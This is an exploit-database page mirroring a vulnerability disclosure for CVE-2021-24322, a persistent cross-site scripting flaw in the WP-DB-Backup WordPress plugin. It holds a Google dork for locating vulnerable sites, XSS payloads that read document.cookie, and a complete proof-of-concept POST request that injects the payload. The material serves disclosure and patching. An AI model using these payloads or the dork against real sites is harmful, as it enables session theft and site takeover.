WP-DB-Backup WordPress Plugin < = 2.3.3 - Authenticated Persistent XSS
CVE
Category
Price
Severity
CVE-2021-24322
CWE-79
Not available
High
Author
Risk
Exploitation Type
Date
Evan Ricafort
High
Remote
2021-05-17
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050085 Below is a copy:
WP-DB-Backup WordPress Plugin <= 2.3.3 - Authenticated Persistent XSS /*!
- # VULNERABILITY: WP-DB-Backup WordPress Plugin <= 2.3.3 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/wp-db-backup/
- # DATE: 2021-04-04
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Austin Matzko [ http://austinmatzko.com ]
- # SOFTWARE VERSION: <= 2.3.3
- # SOFTWARE LINK: https://wordpress.org/plugins/wp-db-backup/
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24322
*/
### -- [ Info: ]
[i] An Authenticated Persistent XSS vulnerability was discovered in the WP-DB-Backup plugin through v2.3.3 for WordPress.
[i] Vulnerable parameter(s): &backup_recipient=.
### -- [ Impact: ]
[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
### -- [ Payloads: ]
[$] " autofocus onfocus=alert(document.cookie); "
[$] " autofocus onfocus=alert(document.domain); "
### -- [ PoC | Authenticated Persistent XSS | Email backup to: ]
[!] POST /wp-admin/tools.php?page=wp-db-backup HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 602
Cookie: [admin cookies]
_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Ftools.php%3Fpage%3Dwp-db-backup&core_tables%5B%5D=wp_commentmeta&core_tables%5B%5D=wp_comments&core_tables%5B%5D=wp_links&core_tables%5B%5D=wp_options&core_tables%5B%5D=wp_postmeta&core_tables%5B%5D=wp_posts&core_tables%5B%5D=wp_term_relationships&core_tables%5B%5D=wp_term_taxonomy&core_tables%5B%5D=wp_terms&core_tables%5B%5D=wp_usermeta&core_tables%5B%5D=wp_users&deliver=smtp&backup_recipient=m0ze%40example.com%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&do_backup=fragments&submit=Backup+now%21
### -- [ Contacts: ]
[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum